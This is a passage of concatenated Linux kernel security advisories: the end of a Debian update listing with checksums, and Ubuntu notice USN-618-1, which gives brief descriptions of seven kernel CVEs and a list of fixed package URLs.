6899ee7990a534276f4c98970a05a843\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch3_powerpc.deb\n    Size/MD5 checksum:  3414514 54cad7ae1cd248f0125aa12c9823f0c7\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc64_2.6.18.dfsg.1-18etch3_powerpc.deb\n    Size/MD5 checksum: 18293832 2025add962d50482de362ee202f8bb79\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-powerpc_2.6.18.dfsg.1-18etch3_powerpc.deb\n    Size/MD5 checksum:   252806 ed8f3ba9ab6384096d25204af0594ed1\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_powerpc.deb\n    Size/MD5 checksum:  3392288 02cba07fa4ab35192737f7a40907cf53\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc-smp_2.6.18.dfsg.1-18etch3_powerpc.deb\n    Size/MD5 checksum: 16969082 d986973f5c4d0e577b169c96ffa0cec4\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc-miboot_2.6.18.dfsg.1-18etch3_powerpc.deb\n    Size/MD5 checksum: 15157518 c3ae440ddcd66b9aaa80260824f91967\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-powerpc64_2.6.18.dfsg.1-18etch3_powerpc.deb\n    Size/MD5 checksum:   253230 4d2e3ce370d0c3caf798cfee0dfc44d2\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-prep_2.6.18.dfsg.1-18etch3_powerpc.deb\n    Size/MD5 checksum:   246254 fa91c1654d4f46128856838066eb11bf\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc-smp_2.6.18.dfsg.1-18etch3_powerpc.deb\n    Size/MD5 checksum:   252272 5eda39b6177f4e66f082c06a159f5719\n\ns390 architecture (IBM S/390)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-s390_2.6.18.dfsg.1-18etch3_s390.deb\n    Size/MD5 checksum:    54058 9e8a26d5500ffcd7a6a29dfac6d570b8\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_s390.deb\n    Size/MD5 checksum:    54032 350d6fe5dcfdefcc6f92e364f0ffba3f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390_2.6.18.dfsg.1-18etch3_s390.deb\n    Size/MD5 checksum:  5401990 4af4cf18cb011bb00bb882f7a03c9a21\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390_2.6.18.dfsg.1-18etch3_s390.deb\n    Size/MD5 checksum:   143264 76db142c20b22a4d0847f6309e0a10da\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch3_s390.deb\n    Size/MD5 checksum:  2966014 81cfb914839c4709399e25ffe9eb2cb5\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390x_2.6.18.dfsg.1-18etch3_s390.deb\n    Size/MD5 checksum:   143688 4291bc7d9865c2842a181b22a7992188\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-18etch3_s390.deb\n    Size/MD5 checksum:  5661534 8f7661bfe58017b2e3aa2eb9ca3ffadd\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390-tape_2.6.18.dfsg.1-18etch3_s390.deb\n    Size/MD5 checksum:  1438796 18d9f041343153cf48f441eeed112885\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390x_2.6.18.dfsg.1-18etch3_s390.deb\n    Size/MD5 checksum:  5619704 7213d869d6e23933ae5e55c87fade8f6\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-18etch3_s390.deb\n    Size/MD5 checksum:   144632 5df45b01064fc7de2106e8b532946cb5\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_s390.deb\n    Size/MD5 checksum:  2942938 7dcac05e6588849c7491ef1004759f39\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_sparc.deb\n    Size/MD5 checksum:  3168126 ef5277a44be4e2fb95d7f7feca1cc568\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc32_2.6.18.dfsg.1-18etch3_sparc.deb\n    Size/MD5 checksum:   165126 8d82f98016c375c250105791051e3021\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc32_2.6.18.dfsg.1-18etch3_sparc.deb\n    Size/MD5 checksum:  6411270 7106725061d98e4036d0ebabd01ca7fa\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc64-smp_2.6.18.dfsg.1-18etch3_sparc.deb\n    Size/MD5 checksum:   195102 73419b6d64a68410924a0471f0d3bf62\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc64_2.6.18.dfsg.1-18etch3_sparc.deb\n    Size/MD5 checksum: 10391364 f35ec6950afc88b69fa814d005b68550\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_sparc.deb\n    Size/MD5 checksum:    54046 dbd49273f393e72c21f056d50f94cf02\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch3_sparc.deb\n    Size/MD5 checksum:  3190444 40bc9af5142779024dea09675f833778\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc64_2.6.18.dfsg.1-18etch3_sparc.deb\n    Size/MD5 checksum:   194260 80fdc90e470899b21ae831aaa06702b9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-sparc64_2.6.18.dfsg.1-18etch3_sparc.deb\n    Size/MD5 checksum:   195828 2036f355f29c418602074540bde81c65\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-sparc64_2.6.18.dfsg.1-18etch3_sparc.deb\n    Size/MD5 checksum: 10693152 7bef279c0e967019fa5e8a07c1eb4019\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc64-smp_2.6.18.dfsg.1-18etch3_sparc.deb\n    Size/MD5 checksum: 10647534 197798f662b6e4fc55d0f64dcea6eeff\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-sparc_2.6.18.dfsg.1-18etch3_sparc.deb\n    Size/MD5 checksum:    54076 8a2d9ac2067a4c8a7b090da06faf4025\n\n  These files will probably be moved into the stable distribution on\n  its next update. \n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show \u003cpkg\u003e\u0027 and http://packages.debian.org/\u003cpkg\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.6 (GNU/Linux)\n\niD8DBQFIGgmwhuANDBmkLRkRAoRpAKCCo/Ja0CkmHW8VQijCHN7Y5l113ACeKR48\n1gWjfQ6MRn5jOphirPT8DZg=\n=22DK\n-----END PGP SIGNATURE-----\n. =========================================================== \nUbuntu Security Notice USN-618-1              June 19, 2008\nlinux-source-2.6.15/20/22 vulnerabilities\nCVE-2007-4571, CVE-2007-5904, CVE-2007-6694, CVE-2008-0007,\nCVE-2008-1294, CVE-2008-1375, CVE-2008-1669\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 6.06 LTS\nUbuntu 7.04\nUbuntu 7.10\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 6.06 LTS:\n  linux-image-2.6.15-52-386       2.6.15-52.67\n  linux-image-2.6.15-52-686       2.6.15-52.67\n  linux-image-2.6.15-52-amd64-generic  2.6.15-52.67\n  linux-image-2.6.15-52-amd64-k8  2.6.15-52.67\n  linux-image-2.6.15-52-amd64-server  2.6.15-52.67\n  linux-image-2.6.15-52-amd64-xeon  2.6.15-52.67\n  linux-image-2.6.15-52-hppa32    2.6.15-52.67\n  linux-image-2.6.15-52-hppa32-smp  2.6.15-52.67\n  linux-image-2.6.15-52-hppa64    2.6.15-52.67\n  linux-image-2.6.15-52-hppa64-smp  2.6.15-52.67\n  linux-image-2.6.15-52-itanium   2.6.15-52.67\n  linux-image-2.6.15-52-itanium-smp  2.6.15-52.67\n  linux-image-2.6.15-52-k7        2.6.15-52.67\n  linux-image-2.6.15-52-mckinley  2.6.15-52.67\n  linux-image-2.6.15-52-mckinley-smp  2.6.15-52.67\n  linux-image-2.6.15-52-powerpc   2.6.15-52.67\n  linux-image-2.6.15-52-powerpc-smp  2.6.15-52.67\n  linux-image-2.6.15-52-powerpc64-smp  2.6.15-52.67\n  linux-image-2.6.15-52-server    2.6.15-52.67\n  linux-image-2.6.15-52-server-bigiron  2.6.15-52.67\n  linux-image-2.6.15-52-sparc64   2.6.15-52.67\n  linux-image-2.6.15-52-sparc64-smp  2.6.15-52.67\n\nUbuntu 7.04:\n  linux-image-2.6.20-17-386       2.6.20-17.36\n  linux-image-2.6.20-17-generic   2.6.20-17.36\n  linux-image-2.6.20-17-hppa32    2.6.20-17.36\n  linux-image-2.6.20-17-hppa64    2.6.20-17.36\n  linux-image-2.6.20-17-itanium   2.6.20-17.36\n  linux-image-2.6.20-17-lowlatency  2.6.20-17.36\n  linux-image-2.6.20-17-mckinley  2.6.20-17.36\n  linux-image-2.6.20-17-powerpc   2.6.20-17.36\n  linux-image-2.6.20-17-powerpc-smp  2.6.20-17.36\n  linux-image-2.6.20-17-powerpc64-smp  2.6.20-17.36\n  linux-image-2.6.20-17-server    2.6.20-17.36\n  linux-image-2.6.20-17-server-bigiron  2.6.20-17.36\n  linux-image-2.6.20-17-sparc64   2.6.20-17.36\n  linux-image-2.6.20-17-sparc64-smp  2.6.20-17.36\n\nUbuntu 7.10:\n  linux-image-2.6.22-15-386       2.6.22-15.54\n  linux-image-2.6.22-15-cell      2.6.22-15.54\n  linux-image-2.6.22-15-generic   2.6.22-15.54\n  linux-image-2.6.22-15-hppa32    2.6.22-15.54\n  linux-image-2.6.22-15-hppa64    2.6.22-15.54\n  linux-image-2.6.22-15-itanium   2.6.22-15.54\n  linux-image-2.6.22-15-lpia      2.6.22-15.54\n  linux-image-2.6.22-15-lpiacompat  2.6.22-15.54\n  linux-image-2.6.22-15-mckinley  2.6.22-15.54\n  linux-image-2.6.22-15-powerpc   2.6.22-15.54\n  linux-image-2.6.22-15-powerpc-smp  2.6.22-15.54\n  linux-image-2.6.22-15-powerpc64-smp  2.6.22-15.54\n  linux-image-2.6.22-15-rt        2.6.22-15.54\n  linux-image-2.6.22-15-server    2.6.22-15.54\n  linux-image-2.6.22-15-sparc64   2.6.22-15.54\n  linux-image-2.6.22-15-sparc64-smp  2.6.22-15.54\n  linux-image-2.6.22-15-ume       2.6.22-15.54\n  linux-image-2.6.22-15-virtual   2.6.22-15.54\n  linux-image-2.6.22-15-xen       2.6.22-15.54\n\nAfter a standard system upgrade you need to reboot your computer to\neffect the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. If\nyou use linux-restricted-modules, you have to update that package as\nwell to get modules which work with the new kernel version. Unless you\nmanually uninstalled the standard kernel metapackages (e.g. linux-386,\nlinux-powerpc, linux-amd64-generic), a standard system upgrade will\nautomatically perform this as well. \n\nDetails follow:\n\nIt was discovered that the ALSA /proc interface did not write the\ncorrect number of bytes when reporting memory allocations.  A local\nattacker might be able to access sensitive kernel memory, leading to\na loss of privacy. (CVE-2007-4571)\n\nMultiple buffer overflows were discovered in the handling of CIFS\nfilesystems.  A malicious CIFS server could cause a client system crash\nor possibly execute arbitrary code with kernel privileges. (CVE-2007-5904)\n\nIt was discovered that PowerPC kernels did not correctly handle reporting\ncertain system details.  By requesting a specific set of information,\na local attacker could cause a system crash resulting in a denial\nof service. (CVE-2007-6694)\n\nIt was discovered that some device driver fault handlers did not\ncorrectly verify memory ranges.  A local attacker could exploit this\nto access sensitive kernel memory, possibly leading to a loss of privacy. \n(CVE-2008-0007)\n\nIt was discovered that CPU resource limits could be bypassed. \nA malicious local user could exploit this to avoid administratively\nimposed resource limits. (CVE-2008-1294)\n\nA race condition was discovered between dnotify fcntl() and close() in\nthe kernel.  If a local attacker performed malicious dnotify requests,\nthey could cause memory consumption leading to a denial of service,\nor possibly send arbitrary signals to any process. (CVE-2008-1375)\n\nOn SMP systems, a race condition existed in fcntl().  Local attackers\ncould perform malicious locks, causing system crashes and leading to\na denial of service. (CVE-2008-1669)\n\n\nUpdated packages for Ubuntu 6.06 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15_2.6.15-52.10.dsc\n      Size/MD5:     2611 f3dd319890b9704ecc00045636534db7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15_2.6.15-52.10.tar.gz\n      Size/MD5:   446767 c94e2a00ecf18fce9dd031ac6e9cd052\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-52.67.diff.gz\n      Size/MD5:  2873504 d7723bb11612357b4608e8f60e4b8418\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-52.67.dsc\n      Size/MD5:     2374 45557a3d6035adbdd6ed5305b0833105\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz\n      Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15_2.6.15.12-52.3.diff.gz\n      Size/MD5:    95993 a73703b2df5faf419f59a512078613a2\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15_2.6.15.12-52.3.dsc\n      Size/MD5:     3194 c10a6c6c95b0be5c93d4681f2a5759b8\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15_2.6.15.12.orig.tar.gz\n      Size/MD5: 97745908 fb5765cfa2b0fdb06deb54fd6e537772\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-52.67_all.deb\n      Size/MD5:  5162896 72f6b6c423959afebb74c6a804c0f388\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-52.67_all.deb\n      Size/MD5:    92962 51e59e2666145a31fb4ac47c3d4ab61e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-52.67_all.deb\n      Size/MD5: 44740314 06fa6b3c9496839b240aa285a9f85e26\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-common_2.6.15.12-52.3_all.deb\n      Size/MD5:    18452 37a5059b2b5efaa59c7e688a6003c732\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-amd64-generic_2.6.15-52.10_amd64.deb\n      Size/MD5:   165150 0a73a8b05abfc08043f9e308459a3a9e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-amd64-k8_2.6.15-52.10_amd64.deb\n      Size/MD5:   165240 50c208a7c25cdf1b13c4edc5703e23b1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-amd64-server_2.6.15-52.10_amd64.deb\n      Size/MD5:   165290 61dc26e3f218600402384d3dd495d6b7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-amd64-xeon_2.6.15-52.10_amd64.deb\n      Size/MD5:   156050 7a9506a56279a9e2f053c931a91cf5d3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/nic-updates-modules-2.6.15-52-amd64-generic-di_2.6.15-52.10_amd64.udeb\n      Size/MD5:    84706 763f0c324d411c838e179af730f45d67\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/scsi-updates-modules-2.6.15-52-amd64-generic-di_2.6.15-52.10_amd64.udeb\n      Size/MD5:    97394 0117222de0bf93e1a89af25d628d6c16\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:    22342 72e3223d194781df52d35571f6325760\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:    44764 43dcd9724184cf62e5f9cab54afe1e13\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:     2304 4e9ebca859508d6c5464ff9f06e57ade\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:    36244 5aaf7d1dbe903fbeeddf3ecfc8901128\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:   102284 5065464eff55e17f28a35f5e57a842bc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:    38874 e26b198e7cc4a18f5797df9f44dd91dd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:    49134 4a80334564469d8118821235792f9bef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:   176690 9aacdae559d3bc97a2640ce4d58da0f6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:    36768 8cffcbc067254877445e6105396a5f16\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:   142248 4c44b18a12bf86917275670a71cd3720\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:    51040 79823112f8894465b411b91357582252\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:   140606 d94e572bb96c18f35c3b536042d34a24\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:   286872 653ea1a2020706629e7a4ec2abe489d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:    97788 6c0387e7d1b0f25d0335a4471931e0be\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:  1650922 76ec5ee75959713b6a6b1cb18c14d646\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-amd64-generic_2.6.15-52.67_amd64.deb\n      Size/MD5:   865032 d6c05bd69946a41ff5973f94ff122aa8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-amd64-k8_2.6.15-52.67_amd64.deb\n      Size/MD5:   869106 ac69148ec23b3387116044527ae22eaf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-amd64-server_2.6.15-52.67_amd64.deb\n      Size/MD5:   870098 07f513158e47bc6a167d5e535dc0162a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-amd64-xeon_2.6.15-52.67_amd64.deb\n      Size/MD5:   869108 ff2a239414471590ab6be64c50de8bf2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52_2.6.15-52.67_amd64.deb\n      Size/MD5:  6921780 5fd6888d0cee59933c68eb44aa2c7a73\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-amd64-generic_2.6.15-52.67_amd64.deb\n      Size/MD5: 20809038 6d59f0d3dfa5f99df35be979b1405a89\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-amd64-k8_2.6.15-52.67_amd64.deb\n      Size/MD5: 20780064 160dc131a43e31bc0ac8901ca74985b3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-amd64-server_2.6.15-52.67_amd64.deb\n      Size/MD5: 21629596 4069011a19bc0bbf68365146ae33c0aa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-amd64-xeon_2.6.15-52.67_amd64.deb\n      Size/MD5: 19896776 39907bab9abcf29f0bf969d3d402ed0c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:    15622 6978c2690730ec2f561763ef5122bcb1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:   240352 2ddb4ac8cf58569791230da89a30a9b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:   202552 147e6b2684c8db670776a7e168ba0512\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:  1048600 5da9db1b27e8954ee79eb80c41eec163\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:  1543100 7ae3da3261b08b812d68021e9797f8af\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:   161644 8a3bcf8f7850a714858ed668ef5b3976\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:     9828 860022b69a682ef0bfa92249055e6e8d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:    80852 1b447c6d6339da87350b44bf223c7d93\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:    49164 2d90f509d7d5ade4b623bc82ac3bea22\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:    35158 077981a17ebfe2bbefa3660f208f43b1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:    70856 4c4c628331820d9ded9e2f8e00ff0ec2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:     6216 2652727a590c6e7248d3be4b2e0f838c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:     9058 92df3c6ba60457acd1f602696df3aac6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:    57874 71fc227183b138479093e72d2dd964c1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:   123330 19a834fb4cff1ac35b96eb6eec3fa5a6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:   101000 e595f2e9f9997f83b7658f0bd7138272\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:    79230 59fb1d8c41d9ecaa1c483981dff8c31c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:  1594716 2df0dbbe97e5c709125495de80a31c3c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:    72278 aeda6dfe658cec5ad60f9580f1c02141\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:    12646 612cd82d3c221c2494a95b10a75f03b9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:    33730 5991265208e2a44916d540822bd1ac9c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:   138546 ef8d40670f8aa326b3de679d3843e42e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:    38926 5cdd7a00236247e10834b2ca00aa938d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb\n      Size/MD5:   278736 3d615d96e1648ed1f8a72b9b770fa847\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/avm-fritz-kernel-source_3.11+2.6.15.12-52.3_amd64.deb\n      Size/MD5:  2405512 0b06044aefe8becb1d0467f5bfdc247d\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/fglrx-kernel-source_8.25.18+2.6.15.12-52.3_amd64.deb\n      Size/MD5:   511050 e10b89624f7e210d063a0197902e19eb\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/nvidia-kernel-source_1.0.8776+2.6.15.12-52.3_amd64.deb\n      Size/MD5:  1754564 c5c2d9b0533602e9c3e3de858184a655\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/nvidia-legacy-kernel-source_1.0.7174+2.6.15.12-52.3_amd64.deb\n      Size/MD5:  1406452 0ea039bbeca0570589afa2e51744c3c1\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/avm-fritz-firmware-2.6.15-52_3.11+2.6.15.12-52.3_amd64.deb\n      Size/MD5:   475572 4432740400b495606aa776d96ba4ba18\n    